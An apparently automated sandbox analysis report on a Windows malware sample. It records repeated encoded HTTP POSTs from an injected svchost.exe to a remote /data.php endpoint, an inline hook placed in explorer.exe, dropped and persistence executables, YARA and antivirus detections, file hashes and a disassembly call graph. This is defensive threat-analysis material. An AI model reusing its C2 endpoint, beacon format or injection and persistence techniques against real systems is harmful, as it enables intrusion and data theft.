                                                                                      Dec 26, 2024 12:06:48.060142994 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      96192.168.2.550002185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:52.185312986 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      97192.168.2.550003185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:52.185345888 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      98192.168.2.550014185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:56.767433882 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      99192.168.2.550015185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:06:56.767530918 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      100192.168.2.550023185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:07:00.544183016 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:07:03.515336037 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:07:01 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      101192.168.2.550024185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:07:00.544238091 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      102192.168.2.550031185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:07:03.834853888 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      103192.168.2.550034185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:07:04.661807060 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:07:06.328583956 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:07:05 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      104192.168.2.550035185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:07:04.661883116 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:07:06.195415020 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:07:05 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      CreateProcessInternalWINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: KERNEL32.DLL
                                                                                      Function NameHook TypeNew Data
                                                                                      CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5F

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:06:04:58
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Users\user\Desktop\52kYJGCon6.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\52kYJGCon6.exe"
                                                                                      Imagebase:0x7ff795d10000
                                                                                      File size:584'192 bytes
                                                                                      MD5 hash:F5C5C9D5A779AD7077CCA7BEF57E94F0
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:06:04:59
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                      Imagebase:0x7ff7e52b0000
                                                                                      File size:55'320 bytes
                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:06:05:00
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff674740000
                                                                                      File size:5'141'208 bytes
                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000003.00000002.3352603162.0000000010A50000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:06:05:08
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe"
                                                                                      Imagebase:0x7ff60e610000
                                                                                      File size:584'192 bytes
                                                                                      MD5 hash:F5C5C9D5A779AD7077CCA7BEF57E94F0
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 66%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:06:05:10
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                      Imagebase:0x7ff7e52b0000
                                                                                      File size:55'320 bytes
                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:06:05:15
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\tmp8AEF.exe"
                                                                                      Imagebase:0x7ff7ca790000
                                                                                      File size:5'915'951 bytes
                                                                                      MD5 hash:543FB2FD6424B11D72633914571E016C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 26%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:06:05:16
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exe"
                                                                                      Imagebase:0x7ff60e610000
                                                                                      File size:584'192 bytes
                                                                                      MD5 hash:F5C5C9D5A779AD7077CCA7BEF57E94F0
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:06:05:18
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\tmp8AEF.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\tmp8AEF.exe"
                                                                                      Imagebase:0x7ff7ca790000
                                                                                      File size:5'915'951 bytes
                                                                                      MD5 hash:543FB2FD6424B11D72633914571E016C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:06:05:18
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                      Imagebase:0x7ff7e52b0000
                                                                                      File size:55'320 bytes
                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:06:05:19
                                                                                      Start date:26/12/2024
                                                                                      Path:C:\Users\user\AppData\Local\Temp\tmp1946.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\tmp1946.exe"
                                                                                      Imagebase:0x7ff6838c0000
                                                                                      File size:1'014'784 bytes
                                                                                      MD5 hash:1A477A5659D817B01A50F2A80CB1D76E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Local\Temp\tmp1946.exe, Author: ditekSHen
                                                                                      Antivirus matches:
                                                                                      • Detection: 53%, ReversingLabs
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:4.4%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:21.9%
                                                                                        Total number of Nodes:1130
                                                                                        Total number of Limit Nodes:18
                                                                                        execution_graph 19015 7ff795d336b0 19053 7ff795d3a198 GetStartupInfoW 19015->19053 19018 7ff795d336c4 19054 7ff795d36bd0 GetProcessHeap 19018->19054 19019 7ff795d33724 19020 7ff795d3374a 19019->19020 19021 7ff795d33731 19019->19021 19022 7ff795d33736 19019->19022 19055 7ff795d35890 19020->19055 19141 7ff795d33840 19021->19141 19150 7ff795d338b4 19022->19150 19029 7ff795d3375c 19031 7ff795d33840 _FF_MSGBANNER 68 API calls 19029->19031 19030 7ff795d33761 19032 7ff795d338b4 _NMSG_WRITE 68 API calls 19030->19032 19031->19030 19034 7ff795d3376b 19032->19034 19033 7ff795d33775 _ioinit0 _RTC_Initialize 19035 7ff795d33780 GetCommandLineW 19033->19035 19036 7ff795d33e08 _mtinitlocknum 3 API calls 19034->19036 19070 7ff795d3a010 GetEnvironmentStringsW 19035->19070 19036->19033 19041 7ff795d337ac 19083 7ff795d39d68 19041->19083 19045 7ff795d337bf 19099 7ff795d33e68 19045->19099 19047 7ff795d33e20 _getptd 68 API calls 19047->19045 19048 7ff795d337c9 19049 7ff795d337d4 19048->19049 19050 7ff795d33e20 _getptd 68 API calls 19048->19050 19105 7ff795d2fba0 19049->19105 19050->19049 19053->19018 19054->19019 19200 7ff795d33f24 EncodePointer 19055->19200 19057 7ff795d3589b 19203 7ff795d3ae00 19057->19203 19059 7ff795d35902 19221 7ff795d35910 19059->19221 19061 7ff795d358a0 19061->19059 19063 7ff795d358bb 19061->19063 19207 7ff795d341d4 19063->19207 19066 7ff795d358d2 FlsSetValue 19066->19059 19067 7ff795d358e4 19066->19067 19212 7ff795d357d4 19067->19212 19071 7ff795d33792 19070->19071 19072 7ff795d3a036 19070->19072 19077 7ff795d39ae0 GetModuleFileNameW 19071->19077 19074 7ff795d34254 _malloc_crt 68 API calls 19072->19074 19075 7ff795d3a058 _UnwindNestedFrames 19074->19075 19076 7ff795d3a071 FreeEnvironmentStringsW 19075->19076 19076->19071 19078 7ff795d39b20 wparse_cmdline 19077->19078 19079 7ff795d3379e 19078->19079 19080 7ff795d39b7b 19078->19080 19079->19041 19193 7ff795d33e20 19079->19193 19081 7ff795d34254 _malloc_crt 68 API calls 19080->19081 19082 7ff795d39b80 wparse_cmdline 19081->19082 19082->19079 19084 7ff795d39d9b GetLocaleNameFromLangCountry 19083->19084 19085 7ff795d337b1 19083->19085 19086 7ff795d39dbb 19084->19086 19085->19045 19085->19047 19087 7ff795d341d4 _calloc_crt 68 API calls 19086->19087 19095 7ff795d39dcb GetLocaleNameFromLangCountry 19087->19095 19088 7ff795d39e33 19089 7ff795d3240c free 68 API calls 19088->19089 19090 7ff795d39e42 19089->19090 19090->19085 19091 7ff795d341d4 _calloc_crt 68 API calls 19091->19095 19092 7ff795d39e73 19093 7ff795d3240c free 68 API calls 19092->19093 19093->19090 19095->19085 19095->19088 19095->19091 19095->19092 19096 7ff795d39e8b 19095->19096 19306 7ff795d3a34c 19095->19306 19315 7ff795d347c0 19096->19315 19101 7ff795d33e7e _IsNonwritableInCurrentImage 19099->19101 19341 7ff795d3af50 19101->19341 19102 7ff795d33e9b _initterm_e 19104 7ff795d33ebe _IsNonwritableInCurrentImage 19102->19104 19344 7ff795d31790 19102->19344 19104->19048 19361 7ff795d2e000 19105->19361 19110 7ff795d2fbcc ExitProcess 19111 7ff795d2fbd4 19595 7ff795d3060c GetCurrentProcess OpenProcessToken 19111->19595 19115 7ff795d2fbef 19116 7ff795d2fc08 19115->19116 19117 7ff795d2fce1 19115->19117 19610 7ff795d30740 CreateMutexA 19116->19610 19622 7ff795d30798 19117->19622 19122 7ff795d2fc1b ExitProcess 19123 7ff795d2fc23 CreateThread CreateThread CreateThread CreateThread 19614 7ff795d301a8 19123->19614 19127 7ff795d2fcc0 19130 7ff795d2fcc7 Sleep 19127->19130 19131 7ff795d2fcd4 ExitProcess 19127->19131 19128 7ff795d2fcfa 19133 7ff795d30740 3 API calls 19128->19133 19129 7ff795d2fda2 19632 7ff795d134f0 19129->19632 19130->19127 19135 7ff795d2fd06 19133->19135 19136 7ff795d2fd0d ExitProcess 19135->19136 19137 7ff795d2fd15 CreateThread CreateThread CreateThread 19135->19137 19138 7ff795d2fd84 19137->19138 19139 7ff795d2fd98 ExitProcess 19138->19139 19140 7ff795d2fd8b Sleep 19138->19140 19140->19138 20387 7ff795d39ea8 19141->20387 19144 7ff795d39ea8 _set_error_mode 68 API calls 19148 7ff795d3385d 19144->19148 19145 7ff795d338b4 _NMSG_WRITE 68 API calls 19146 7ff795d33874 19145->19146 19149 7ff795d338b4 _NMSG_WRITE 68 API calls 19146->19149 19147 7ff795d3387e 19147->19022 19148->19145 19148->19147 19149->19147 19151 7ff795d338e8 _NMSG_WRITE 19150->19151 19153 7ff795d39ea8 _set_error_mode 65 API calls 19151->19153 19189 7ff795d33a22 19151->19189 19154 7ff795d338fe 19153->19154 19156 7ff795d33a24 GetStdHandle 19154->19156 19157 7ff795d39ea8 _set_error_mode 65 API calls 19154->19157 19160 7ff795d33a3c std::exception::_Copy_str 19156->19160 19156->19189 19158 7ff795d3390f 19157->19158 19158->19156 19159 7ff795d33920 19158->19159 19162 7ff795d3a34c __lc_lctowcs 65 API calls 19159->19162 19159->19189 19161 7ff795d33a74 WriteFile 19160->19161 19161->19189 19163 7ff795d3394b 19162->19163 19164 7ff795d33955 GetModuleFileNameW 19163->19164 19183 7ff795d33b0f 19163->19183 19166 7ff795d3397a 19164->19166 19171 7ff795d33993 GetLocaleNameFromLangCountry 19164->19171 19165 7ff795d347c0 _invoke_watson 15 API calls 19167 7ff795d33b22 19165->19167 19168 7ff795d3a34c __lc_lctowcs 65 API calls 19166->19168 19169 7ff795d3398b 19168->19169 19169->19171 19172 7ff795d33abc 19169->19172 19170 7ff795d339dd 20402 7ff795d3a2c4 19170->20402 19171->19170 20393 7ff795d3a3d4 19171->20393 19174 7ff795d347c0 _invoke_watson 15 API calls 19172->19174 19176 7ff795d33ad0 19174->19176 19182 7ff795d347c0 _invoke_watson 15 API calls 19176->19182 19178 7ff795d33afa 19179 7ff795d347c0 _invoke_watson 15 API calls 19178->19179 19179->19183 19181 7ff795d3a2c4 _NMSG_WRITE 65 API calls 19184 7ff795d33a05 19181->19184 19185 7ff795d33ae5 19182->19185 19183->19165 19184->19185 19186 7ff795d33a0d 19184->19186 19188 7ff795d347c0 _invoke_watson 15 API calls 19185->19188 20411 7ff795d3a4a0 EncodePointer 19186->20411 19188->19178 20436 7ff795d36bb0 19189->20436 19190 7ff795d33e08 20458 7ff795d33dc4 GetModuleHandleExW 19190->20458 19194 7ff795d33840 _FF_MSGBANNER 68 API calls 19193->19194 19195 7ff795d33e2d 19194->19195 19196 7ff795d338b4 _NMSG_WRITE 68 API calls 19195->19196 19197 7ff795d33e34 19196->19197 20461 7ff795d33ff4 19197->20461 19201 7ff795d33f3d _init_pointers 19200->19201 19202 7ff795d38104 EncodePointer 19201->19202 19202->19057 19205 7ff795d3ae1b 19203->19205 19204 7ff795d3ae21 InitializeCriticalSectionAndSpinCount 19204->19205 19205->19204 19206 7ff795d3ae4c 19205->19206 19206->19061 19208 7ff795d341f9 19207->19208 19210 7ff795d34236 19208->19210 19211 7ff795d34217 Sleep 19208->19211 19228 7ff795d3af94 19208->19228 19210->19059 19210->19066 19211->19208 19211->19210 19258 7ff795d3ac78 19212->19258 19222 7ff795d3591f 19221->19222 19223 7ff795d3ad0a 19222->19223 19224 7ff795d3acec DeleteCriticalSection 19222->19224 19226 7ff795d3ad1f DeleteCriticalSection 19223->19226 19227 7ff795d3374f 19223->19227 19225 7ff795d3240c free 68 API calls 19224->19225 19225->19222 19226->19223 19227->19029 19227->19030 19227->19033 19229 7ff795d3afa9 19228->19229 19234 7ff795d3afc6 19228->19234 19230 7ff795d3afb7 19229->19230 19229->19234 19236 7ff795d359a4 19230->19236 19232 7ff795d3afde HeapAlloc 19233 7ff795d3afbc 19232->19233 19232->19234 19233->19208 19234->19232 19234->19233 19239 7ff795d33d88 DecodePointer 19234->19239 19241 7ff795d35750 GetLastError 19236->19241 19238 7ff795d359ad 19238->19233 19240 7ff795d33da3 19239->19240 19240->19234 19243 7ff795d3576d 19241->19243 19242 7ff795d357bc SetLastError 19242->19238 19243->19242 19244 7ff795d341d4 _calloc_crt 65 API calls 19243->19244 19245 7ff795d35782 19244->19245 19245->19242 19246 7ff795d3579f 19245->19246 19247 7ff795d357b5 19245->19247 19248 7ff795d357d4 _initptd 65 API calls 19246->19248 19252 7ff795d3240c 19247->19252 19250 7ff795d357a6 GetCurrentThreadId 19248->19250 19250->19242 19251 7ff795d357ba 19251->19242 19253 7ff795d32441 realloc 19252->19253 19254 7ff795d32411 HeapFree 19252->19254 19253->19251 19254->19253 19255 7ff795d3242c 19254->19255 19256 7ff795d359a4 _errno 66 API calls 19255->19256 19257 7ff795d32431 GetLastError 19256->19257 19257->19253 19259 7ff795d3aca7 EnterCriticalSection 19258->19259 19260 7ff795d3ac96 